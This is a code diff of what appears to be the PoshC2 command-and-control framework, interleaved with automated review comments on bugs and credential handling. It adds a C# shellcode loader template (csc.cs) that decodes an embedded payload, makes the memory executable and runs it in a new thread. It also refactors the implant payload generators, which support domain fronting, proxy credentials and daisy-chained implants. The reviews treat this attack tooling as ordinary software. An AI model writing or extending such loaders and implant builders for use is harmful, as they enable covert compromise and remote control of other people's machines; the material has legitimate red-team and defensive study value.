diff --git a/C2Server.py b/C2Server.py index fc3e864..050b308 100644 --- a/C2Server.py +++ b/C2Server.py @@ -283,6 +283,7 @@ if __name__ == '__main__': C2[13], C2[11], "", "", C2[19], C2[20], C2[21], get_newimplanturl(), PayloadsDirectory) + new_urldetails( "default", C2[1], C2[3], "", "", "", "" ) newPayload.CreateRaw() newPayload.CreateDlls() newPayload.CreateShellcode() diff --git a/Config.py b/Config.py index cb8fa4c..6d0a74f 100644 --- a/Config.py +++ b/Config.py @@ -4,8 +4,8 @@ HOST_NAME = '0.0.0.0' PORT_NUMBER = 443 POSHDIR = "/opt/PoshC2_Python/" -ROOTDIR = "/opt/PoshC2-Project/" -HostnameIP = "https://172.16.0.126" +ROOTDIR = "/opt/PoshC2_Project/" +HostnameIP = "https://172.19.131.109" ServerPort = "443" DomainFrontHeader = "" # example df.azureedge.net DefaultSleep = "5" @@ -62,7 +62,7 @@ logo = """__________ .__. _________ ________ | | ( <_> )___ \| Y \ \ \____/ \ |____| \____/____ >___| / \______ /\_______ \ \/ \/ \/ \/ - =============== v4.1 www.PoshC2.co.uk =============""" + =============== v4.2 www.PoshC2.co.uk =============""" # DO NOT CHANGE # diff --git a/DB.py b/DB.py index 54418f3..5800c0a 100644 --- a/DB.py +++ b/DB.py @@ -42,6 +42,17 @@ def initializedb(): RandomURI TEXT, Command TEXT);""" + create_urls = """CREATE TABLE URLs ( + URLID INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL UNIQUE, + RandomID TEXT, + URL TEXT, + HostHeader TEXT, + ProxyURL TEXT, + ProxyUsername TEXT, + ProxyPassword TEXT, + CredentialExpiry TEXT + );""" + create_creds = """CREATE TABLE Creds ( credsID INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL UNIQUE, Username TEXT, @@ -88,6 +99,7 @@ def initializedb(): c.execute(create_completedtasks) c.execute(create_tasks) c.execute(create_creds) + c.execute(create_urls) c.execute(create_c2server) c.execute(create_history) conn.commit() 
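Review bot: The first Config.py hunk replaces one live address with another in `HostnameIP = "https://172.19.131.109"`, so the tracked file keeps carrying the environment of whoever last committed and every deployment has to edit a versioned file; the `ROOTDIR` change on the line above has the same problem. Keep the tracked value a placeholder, e.g. `HostnameIP = "https://<c2-host>"` (constructed example), and read the real one from an untracked local override or an environment variable. The second Config.py hunk only changes the version string in the banner.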
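Review bot: `create_urls` is only executed from `initializedb()`, so a database created by an earlier version has no URLs table and the new `new_urldetails` / `get_c2urls` calls will raise `sqlite3.OperationalError` against it. If `initializedb` runs only when the database file does not yet exist (the function starts before this hunk, so I cannot confirm), the commit needs either a `CREATE TABLE IF NOT EXISTS URLs (...)` executed at startup or a schema-version check. The new `ProxyPassword TEXT` column stores the credential in clear next to the rest of the data; a comment on the schema stating that, together with restrictive permissions on the database file, would make the exposure explicit to whoever deploys this.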
@@ -134,6 +146,13 @@ def get_nettasks_all(): else: return None +def new_urldetails( RandomID, URL, HostHeader, ProxyURL, ProxyUsername, ProxyPassword, CredentialExpiry ): + conn = sqlite3.connect(DB) + conn.text_factory = str + c = conn.cursor() + c.execute("INSERT INTO URLs (RandomID, URL, HostHeader, ProxyURL, ProxyUsername, ProxyPassword, CredentialExpiry) VALUES (?, ?, ?, ?, ?, ?, ?)",(RandomID, URL, HostHeader, ProxyURL, ProxyUsername, ProxyPassword, CredentialExpiry)) + conn.commit() + def drop_nettasks(): conn = sqlite3.connect(DB) conn.row_factory = sqlite3.Row @@ -539,6 +558,17 @@ def get_hostinfo(randomuri): else: return None +def get_c2urls(): + conn = sqlite3.connect(DB) + conn.row_factory = sqlite3.Row + c = conn.cursor() + c.execute("SELECT * FROM URLs") + result = c.fetchall() + if result: + return result + else: + return None + def get_autoruns(): conn = sqlite3.connect(DB) conn.row_factory = sqlite3.Row diff --git a/Files/csc.cs b/Files/csc.cs new file mode 100755 index 0000000..5943200 --- /dev/null +++ b/Files/csc.cs 
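Review bot: `new_urldetails` opens a connection, commits and returns without ever closing it; the parameterized INSERT is correct, but the connection is left to the garbage collector. If the rest of DB.py closes connections after use (the neighbouring functions are cut by the hunk, so I cannot tell), follow that convention; otherwise wrap it as `with contextlib.closing(sqlite3.connect(DB)) as conn:` (needs `import contextlib` at the top of the file). The `ProxyPassword` argument is written unencrypted, so a one-line docstring such as `"""Record a payload URL and its proxy settings; ProxyPassword is stored in clear."""` would make that visible to callers.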
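Review bot: `get_c2urls` returns None rather than an empty list when the URLs table has no rows, and the new `show-urls` handler in ImplantHandler.py iterates the result directly with `for i in urls:`, so listing URLs on a fresh database raises TypeError. Returning None mirrors the other getters in DB.py, so the smaller fix is in the caller: `for i in (urls or []):`. A docstring stating the contract, e.g. `"""Return every row of the URLs table, or None when the table is empty."""`, would keep the next caller from the same trap.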
@@ -0,0 +1,84 @@
+using System;
+using System.Reflection;
+using System.Diagnostics;
+using System.Configuration.Install;
+using System.Runtime.InteropServices;
+using System.Threading;
+
+class Program
+ {
+ [Flags()]
+ public enum AllocationType : uint
+ {
+ COMMIT = 0x1000,
+ RESERVE = 0x2000,
+ RESET = 0x80000,
+ LARGE_PAGES = 0x20000000,
+ PHYSICAL = 0x400000,
+ TOP_DOWN = 0x100000,
+ WRITE_WATCH = 0x200000
+ }
+
+ public enum Protection
+ {
+ PAGE_NOACCESS = 0x01,
+ PAGE_READONLY = 0x02,
+ PAGE_READWRITE = 0x04,
+ PAGE_WRITECOPY = 0x08,
+ PAGE_EXECUTE = 0x10,
+ PAGE_EXECUTE_READ = 0x20,
+ PAGE_EXECUTE_READWRITE = 0x40,
+ PAGE_EXECUTE_WRITECOPY = 0x80,
+ PAGE_GUARD = 0x100,
+ PAGE_NOCACHE = 0x200,
+ PAGE_WRITECOMBINE = 0x400
+ }
+
+ [DllImport("kernel32.dll", SetLastError=true)]
+ static extern IntPtr VirtualAlloc(IntPtr lpAddress, IntPtr dwSize, AllocationType flAllocationType, Protection flProtect);
+
+ [DllImport("Kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
+ static extern IntPtr CreateThread(
+ IntPtr lpThreadAttributes,
+ uint dwStackSize,
+ IntPtr lpStartAddress,
+ IntPtr lpParameter,
+ uint dwCreationFlags,
+ out uint lpThreadId);
+
+ [DllImport("kernel32.dll", SetLastError = true)]
+ static extern bool VirtualProtect(IntPtr lpAddress, IntPtr dwSize, Protection flNewProtect, out uint lpflOldProtect);
+
+ static void Main(string[] args)
+ {
+ byte[] shell = null;
+
+ string safdsv64 = "#REPLACEME64#";
+ string safdsv32 = "#REPLACEME32#";
+
+ if (IntPtr.Size == 4)
+ {
+ // 32-bit
+ shell = Convert.FromBase64String(safdsv32);
+ }
+ else if (IntPtr.Size == 8)
+ {
+ // 64-bit
+ shell = Convert.FromBase64String(safdsv64);
+ }
+
+ IntPtr mem = VirtualAlloc(IntPtr.Zero, (IntPtr)(shell.Length*2), AllocationType.COMMIT, Protection.PAGE_READWRITE);
+
+ if( mem != IntPtr.Zero )
+ {
+ uint oldProt = 0;
+ uint threadId = 0;
+ Marshal.Copy(shell, 0, mem, shell.Length);
+ VirtualProtect(mem, (IntPtr)(shell.Length * 2), 
Protection.PAGE_EXECUTE_READWRITE, out oldProt); + CreateThread(IntPtr.Zero, 0, mem, IntPtr.Zero, 0, out threadId); + WaitHandle wh = new EventWaitHandle(false, EventResetMode.ManualReset); + wh.WaitOne(); + } + } + +} diff --git a/Help.py b/Help.py index 0aec73e..6da7c68 100644 --- a/Help.py +++ b/Help.py @@ -283,6 +283,8 @@ Server Commands: ===================== tasks opsec +show-urls +list-urls cleartasks show-serverinfo history @@ -305,7 +307,7 @@ posh_help = posh_help1 + posh_help2 + posh_help3 + posh_help4 + posh_help5 + pos # pre help commands -PRECOMMANDS = ['add-autorun' ,'list-autorun','del-autorun', 'nuke-autorun','automigrate-frompowershell', +PRECOMMANDS = ['list-urls','show-urls', 'add-autorun' ,'list-autorun','del-autorun', 'nuke-autorun','automigrate-frompowershell', 'show-serverinfo','history','output-to-html','set-clockworksmsapikey','set-clockworksmsnumber','set-defaultbeacon', 'listmodules','pwnself','creds','createnewpayload','createproxypayload','listmodules', 'createdaisypayload','turnoff-notifications','turnon-notifications','tasks','cleartasks',"opsec"] diff --git a/ImplantHandler.py b/ImplantHandler.py index 49c00ee..d730723 100644 --- a/ImplantHandler.py +++ b/ImplantHandler.py 
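Review bot: Files/csc.cs declares `using System.Reflection;`, `using System.Diagnostics;` and `using System.Configuration.Install;` but nothing in the file references those namespaces; dropping the three lines keeps the template's declared surface equal to what it uses. The body of `class Program` also mixes one-space and no indentation, which will make every later diff against this file noisy.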
@@ -17,6 +17,80 @@ from Core import * def catch_exit(signum, frame): sys.exit(0) +def createproxypayload(): + proxyuser = raw_input("Proxy User: e.g. Domain\\user ") + proxypass = raw_input("Proxy Password: e.g. Password1 ") + proxyurl = raw_input("Proxy URL: .e.g. http://10.150.10.1:8080 ") + credsexpire = raw_input("Password/Account Expiration Date: .e.g. 15/03/2018 ") + update_item("ProxyURL", "C2Server", proxyurl) + update_item("ProxyUser", "C2Server", proxyuser) + update_item("ProxyPass", "C2Server", proxypass) + C2 = get_c2server_all() + newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12], + C2[13], C2[11], "", "", C2[19], C2[20], + C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory) + newPayload.CreateRaw("Proxy") + newPayload.CreateDlls("Proxy") + newPayload.CreateShellcode("Proxy") + newPayload.CreateEXE("Proxy") + newPayload.CreateMsbuild("Proxy") + new_urldetails( "Proxy", C2[1], C2[3], proxyurl, proxyuser, proxypass, credsexpire ) + startup("Created new proxy payloads") + +def createdaisypayload(): + name = raw_input("Daisy name: e.g. DC1 ") + domain = raw_input("Domain or URL: https://www.example.com ") + daisyurl = raw_input("Daisy host: .e.g. http://10.150.10.1 ") + daisyport = raw_input("Daisy port: .e.g. 8888 ") + daisyhostid = raw_input("Select Daisy Implant Host: e.g. 
5 ") + daisyhost = get_implantbyid(daisyhostid) + proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}" + C2 = get_c2server_all() + newPayload = Payloads(C2[5], C2[2], daisyurl, "", daisyport, "", "", "", + "", proxynone, C2[19], C2[20], + C2[21], "%s?d" % get_newimplanturl(), PayloadsDirectory) + newPayload.C2Core = (newPayload.C2Core).replace("$pid;%s" % (daisyurl+":"+daisyport),"$pid;%s@%s" % (daisyhost[11],daisyhost[3])) + newPayload.CreateRaw(name) + newPayload.CreateDlls(name) + newPayload.CreateShellcode(name) + newPayload.CreateEXE(name) + newPayload.CreateMsbuild(name) + new_urldetails( name, C2[1], C2[3], domain, daisyurl, daisyhostid, "" ) + startup("Created new %s daisy payloads" % name) + +def createnewpayload(): + domain = raw_input("Domain or URL: https://www.example.com ") + domainbase = (domain.lower()).replace('https://','') + domainbase = domainbase.replace('http://','') + domainfront = raw_input("Domain front URL: e.g. fjdsklfjdskl.cloudfront.net ") + proxyurl = raw_input("Proxy URL: .e.g. http://10.150.10.1:8080 ") + randomid = randomuri(5) + proxyuser = "" + proxypass = "" + credsexpire = "" + if proxyurl: + proxyuser = raw_input("Proxy User: e.g. Domain\\user ") + proxypass = raw_input("Proxy Password: e.g. Password1 ") + credsexpire = raw_input("Password/Account Expiration Date: .e.g. 
15/03/2018 ") + imurl = "%s?p" % get_newimplanturl() + domainbase = "Proxy%s%s" % (domainbase,randomid) + else: + domainbase = "%s%s" % (randomid,domainbase) + imurl = get_newimplanturl() + C2 = get_c2server_all() + newPayload = Payloads(C2[5], C2[2], domain, domainfront, C2[8], proxyuser, + proxypass, proxyurl, "", "", C2[19], C2[20], + C2[21], imurl, PayloadsDirectory) + newPayload.CreateRaw("%s_" % domainbase) + newPayload.CreateDlls("%s_" % domainbase) + newPayload.CreateShellcode("%s_" % domainbase) + newPayload.CreateEXE("%s_" % domainbase) + newPayload.CreateMsbuild("%s_" % domainbase) + newPayload.CreatePython("%s_" % domainbase) + new_urldetails( randomid, domain, domainfront, proxyurl, proxyuser, proxypass, credsexpire ) + startup("Created new payloads") + + def argp(cmd): args = "" try: @@ -163,7 +237,12 @@ def startup(printhelp = ""): graphviz() time.sleep(1) startup() - + if ("show-urls" in implant_id.lower()) or ("list-urls" in implant_id.lower()): + urls = get_c2urls() + urlformatted = "RandomID URL HostHeader ProxyURL ProxyUsername ProxyPassword CredentialExpiry\n" + for i in urls: + urlformatted += "%s %s %s %s %s %s %s %s \n" % (i[0],i[1],i[2],i[3],i[4],i[5],i[6],i[7]) + startup(urlformatted) if "add-autorun" in implant_id.lower(): autorun = (implant_id.lower()).replace("add-autorun ","") autorun = autorun.replace("add-autorun","") 
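Review bot: In `createdaisypayload`, the call `new_urldetails( name, C2[1], C2[3], domain, daisyurl, daisyhostid, "" )` puts `domain` in the ProxyURL column, `daisyurl` in ProxyUsername and `daisyhostid` in ProxyPassword, so the URLs row for a daisy payload records those values under the wrong names and `show-urls` will display the implant id as a password. Either pass the daisy values in the URL/HostHeader positions with empty strings for the proxy columns, or add dedicated columns for them. Separately, `createproxypayload` and `createnewpayload` read the proxy password with `raw_input`, which echoes it to the terminal and into any session recording; `getpass.getpass("Proxy Password: ")` keeps it off screen (needs `import getpass`).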
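Review bot: The `show-urls` header names seven columns while each row is formatted with eight placeholders starting at `i[0]` (URLID), so every printed column is shifted by one relative to its heading; either add `URLID` to the header string or start the row at `i[1]`. The listing also prints ProxyPassword in clear, which leaves credentials in terminal scrollback and session logs; printing `"***"` in place of `i[6]` when it is non-empty is enough for an overview. `startup` begins before this hunk.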
@@ -266,69 +345,13 @@ def startup(printhelp = ""): sys.exit(0) if "createdaisypayload" in implant_id.lower(): - name = raw_input("Daisy name: e.g. DC1 ") - daisyurl = raw_input("Daisy host: .e.g. http://10.150.10.1 ") - daisyport = raw_input("Daisy port: .e.g. 8888 ") - daisyhostid = raw_input("Select Daisy Implant Host: e.g. 5 ") - daisyhost = get_implantbyid(daisyhostid) - proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}" - - C2 = get_c2server_all() - newPayload = Payloads(C2[5], C2[2], daisyurl, "", daisyport, "", "", "", - "", proxynone, C2[19], C2[20], - C2[21], "%s?d" % get_newimplanturl(), PayloadsDirectory) - newPayload.C2Core = (newPayload.C2Core).replace("$pid;%s" % (daisyurl+":"+daisyport),"$pid;%s@%s" % (daisyhost[11],daisyhost[3])) - newPayload.CreateRaw(name) - newPayload.CreateDlls(name) - newPayload.CreateShellcode(name) - newPayload.CreateEXE(name) - newPayload.CreateMsbuild(name) - startup("Created new %s daisy payloads" % name) + createdaisypayload() if "createproxypayload" in implant_id.lower(): - proxyuser = raw_input("Proxy User: e.g. Domain\\user ") - proxypass = raw_input("Proxy Password: e.g. Password1 ") - proxyurl = raw_input("Proxy URL: .e.g. 
http://10.150.10.1:8080 ") - update_item("ProxyURL", "C2Server", proxyurl) - update_item("ProxyUser", "C2Server", proxyuser) - update_item("ProxyPass", "C2Server", proxypass) - C2 = get_c2server_all() - newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12], - C2[13], C2[11], "", "", C2[19], C2[20], - C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory) - - newPayload.CreateRaw("Proxy") - newPayload.CreateDlls("Proxy") - newPayload.CreateShellcode("Proxy") - newPayload.CreateEXE("Proxy") - newPayload.CreateMsbuild("Proxy") - startup("Created new proxy payloads") + createproxypayload() if "createnewpayload" in implant_id.lower(): - domain = raw_input("Domain or URL: https://www.example.com ") - domainbase = (domain.lower()).replace('https://','') - domainbase = domainbase.replace('http://','') - domainfront = raw_input("Domain front URL: e.g. fjdsklfjdskl.cloudfront.net ") - proxyuser = raw_input("Proxy User: e.g. Domain\\user ") - proxypass = raw_input("Proxy Password: e.g. Password1 ") - proxyurl = raw_input("Proxy URL: .e.g. http://10.150.10.1:8080 ") - if proxyurl: - imurl = "%s?p" % get_newimplanturl() - domainbase = "Proxy%s" % domainbase - else: - imurl = get_newimplanturl() - C2 = get_c2server_all() - newPayload = Payloads(C2[5], C2[2], domain, domainfront, C2[8], proxyuser, - proxypass, proxyurl, "", "", C2[19], C2[20], - C2[21], imurl, PayloadsDirectory) - - newPayload.CreateRaw("%s_" % domainbase) - newPayload.CreateDlls("%s_" % domainbase) - newPayload.CreateShellcode("%s_" % domainbase) - newPayload.CreateEXE("%s_" % domainbase) - newPayload.CreateMsbuild("%s_" % domainbase) - newPayload.CreatePython("%s_" % domainbase) - startup("Created new payloads") + createnewpayload() if (implant_id == "?") or (implant_id == "help"): startup(pre_help) 
@@ -864,69 +887,14 @@ def runcommand(command, randomuri): new_task("[System.Net.Dns]::GetHostEntry(\"%s\")" % params, randomuri) elif "createdaisypayload" in command.lower(): - name = raw_input("Daisy name: e.g. DC1 ") - daisyurl = raw_input("Daisy host: .e.g. http://10.150.10.1 ") - daisyport = raw_input("Daisy port: .e.g. 8888 ") - daisyhostid = raw_input("Select Daisy Implant Host: e.g. 5 ") - daisyhost = get_implantbyid(daisyhostid) - proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}" - - C2 = get_c2server_all() - newPayload = Payloads(C2[5], C2[2], daisyurl, "", daisyport, "", "", "", - "", proxynone, C2[19], C2[20], - C2[21], "%s?d" % get_newimplanturl(), PayloadsDirectory) - newPayload.C2Core = (newPayload.C2Core).replace("$pid;%s" % (daisyurl+":"+daisyport),"$pid;%s@%s" % (daisyhost[11],daisyhost[3])) - newPayload.CreateRaw(name) - newPayload.CreateDlls(name) - newPayload.CreateShellcode(name) - newPayload.CreateEXE(name) - newPayload.CreateMsbuild(name) - startup("Created new %s daisy payloads" % name) + createdaisypayload() elif "createproxypayload" in command.lower(): - proxyuser = raw_input("Proxy User: e.g. Domain\\user ") - proxypass = raw_input("Proxy Password: e.g. Password1 ") - proxyurl = raw_input("Proxy URL: .e.g. 
http://10.150.10.1:8080 ") - update_item("ProxyURL", "C2Server", proxyurl) - update_item("ProxyUser", "C2Server", proxyuser) - update_item("ProxyPass", "C2Server", proxypass) - C2 = get_c2server_all() - newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12], - C2[13], C2[11], "", "", C2[19], C2[20], - C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory) - - newPayload.CreateRaw("Proxy") - newPayload.CreateDlls("Proxy") - newPayload.CreateShellcode("Proxy") - newPayload.CreateEXE("Proxy") - newPayload.CreateMsbuild("Proxy") - startup("Created new proxy payloads") + createproxypayload() elif "createnewpayload" in command.lower(): - domain = raw_input("Domain or URL: https://www.example.com ") - domainbase = (domain.lower()).replace('https://','') - domainbase = domainbase.replace('http://','') - domainfront = raw_input("Domain front URL: e.g. fjdsklfjdskl.cloudfront.net ") - proxyuser = raw_input("Proxy User: e.g. Domain\\user ") - proxypass = raw_input("Proxy Password: e.g. Password1 ") - proxyurl = raw_input("Proxy URL: .e.g. http://10.150.10.1:8080 ") - if proxyurl: - imurl = "%s?p" % get_newimplanturl() - domainbase = "Proxy%s" % domainbase - else: - imurl = get_newimplanturl() - C2 = get_c2server_all() - newPayload = Payloads(C2[5], C2[2], domain, domainfront, C2[8], proxyuser, - proxypass, proxyurl, "", "", C2[19], C2[20], - C2[21], imurl, PayloadsDirectory) + createproxypayload() - newPayload.CreateRaw("%s_" % domainbase) - newPayload.CreateDlls("%s_" % domainbase) - newPayload.CreateShellcode("%s_" % domainbase) - newPayload.CreateEXE("%s_" % domainbase) - newPayload.CreateMsbuild("%s_" % domainbase) - newPayload.CreatePython("%s_" % domainbase) - startup("Created new payloads") else: if command: new_task(command, randomuri) diff --git a/Payloads.py b/Payloads.py index 09996ce..a05bdf0 100644 --- a/Payloads.py +++ b/Payloads.py 
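Review bot: The `createnewpayload` branch of `runcommand` now calls `createproxypayload()` (the lone added line after the removed block), so issuing createnewpayload from an implant prompt builds a proxy payload and the new-payload path is unreachable from there; the line should read `createnewpayload()`, matching the same branch in `startup` in the previous hunk. `runcommand` begins and ends outside the hunk.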
@@ -27,13 +27,11 @@ class Payloads(object): self.ConnectURL = ConnectURL self.BaseDirectory = BaseDirectory if os.path.exists("%saes.py" % PayloadsDirectory): - print "FOUND AES" with open("%saes.py" % PayloadsDirectory, 'rb') as f: content = f.read() import re m = re.search('#KEY(.+?)#KEY', content); if m: keyfound = m.group(1) - print keyfound self.PythonHash = hashlib.sha512(content).hexdigest() self.PythonKey = keyfound else: @@ -498,6 +496,17 @@ End Sub x86base64 = base64.b64encode(b86.read()) with open(x64filename, "rb") as b64: x64base64 = base64.b64encode(b64.read()) + with open("%scsc.cs" % FilesDirectory, 'rb') as f: + content = f.read() + ccode = content.replace("#REPLACEME32#",x86base64) + ccode = ccode.replace("#REPLACEME64#",x64base64) + filename = "%scsc.cs" % (self.BaseDirectory) + output_file = open(filename, 'w') + output_file.write(ccode) + output_file.close() + self.QuickstartLog( "" ) + self.QuickstartLog( "CSC file written to: %s%scsc.cs" % (self.BaseDirectory,name) ) + projname = randomuri() msbuild="""
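Review bot: In the second Payloads.py hunk the file is written to `"%scsc.cs" % (self.BaseDirectory)` while the log line reports `"%s%scsc.cs" % (self.BaseDirectory,name)`, so the message points at a path that is never created, and because `name` is not part of the written filename every payload generated into the same BaseDirectory silently overwrites the previous csc.cs. Derive both from one expression, e.g. `filename = "%s%scsc.cs" % (self.BaseDirectory, name)`, and write it with `with open(filename, 'w') as output_file:` as the surrounding code already does for its reads, so the handle is closed on error too. The enclosing method starts and ends outside the hunk.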